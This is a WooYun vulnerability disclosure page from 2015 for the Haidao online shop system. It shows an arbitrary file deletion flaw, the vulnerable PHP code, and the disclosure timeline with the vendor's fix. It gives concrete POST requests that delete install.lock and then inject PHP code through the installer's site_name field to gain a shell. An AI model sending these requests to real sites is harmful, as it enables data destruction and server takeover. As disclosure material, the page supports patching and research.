当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139987

漏洞标题:Haidao网店系统最新版任意文件删除&&前台getshell

相关厂商:www.haidao.la

漏洞作者: %270x5c

提交时间:2015-09-10 14:22

修复时间:2015-12-10 12:44

公开时间:2015-12-10 12:44

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-11: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

v1.12.3.150828

详细说明:

#1
在 /appliaction/Controller/User/OrderReturnController.class.php中有一段很可怕的代码= =

public function delete_img() {
		$img_url = $_SERVER['DOCUMENT_ROOT'].$_GET['img_url'];
		
		if (file_exists($img_url)) {
			$result = unlink($img_url);
		}
		$result ? showmessage('文件删除成功','',1) : showmessage('文件删除失败') ;
	}


这个文件继承的 UserBaseController。 那么也就是说随意注册个用户即可执行这段代码。
由于$_GET['img_url']可控,可以删除全站任意文件
#2
post 提交

http://localhost/index.php?m=user&c=OrderReturn&a=delete_img
img_url=/install/install.lock


h1.png


然后看到
www/install/include/function.php

.......
$site_name 	  = url_get('site_name');
	$site_keywords 	= url_get('site_keywords');
	$site_description    	= url_get('site_description');
.....
$configDefFile = ROOT_PATH.'./install/site.php';
	$configFile    = ROOT_PATH.'./config/site.php';
	$updateData    = array(
		'{SITE_NAME}' 		=> $site_name,
		'{SITE_KEYWORDS}' 	=> $site_keywords,
		'{SITE_DESCRIPTION}'=> $site_description,
		'{SITE_KEY}'		=> generate_password(),
	);
	$is_success = create_config($configFile,$configDefFile,$updateData);


这里可以写入文件。
在 install/index.php中有个逻辑错误

if(get_magic_quotes_gpc()) //应该是 if(!get_magic_quotes_gpc()) 吧
{
	$_POST    = stripSlash($_POST);
	$_GET     = stripSlash($_GET);
	$_COOKIE  = stripSlash($_COOKIE);
}


综上。在自己的服务器开启mysql外连。post提交
http://localhost:801//install/index.php?act=install_4

db_address=远程mysqlip&db_name=**&db_user=**&db_pwd=**&db_pre=hd_&site_name=a','a'=>phpinfo(),//&site_keywords=aaaaaaaa&site_description=aaaaaaaa&admin_user=admin&admin_pwd=admina&admin_email=adminaaa%40qq.coim


即可getshell。

h2.png


由于会重装系统,所以就不demo测试了。

漏洞证明:

h2.png


h1.png

修复方案:

补。

版权声明:转载请注明来源 %270x5c@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-09-11 12:42

厂商回复:

感谢对海盗云商的关注,我们会尽快修复!

最新状态:

2015-09-15:已修复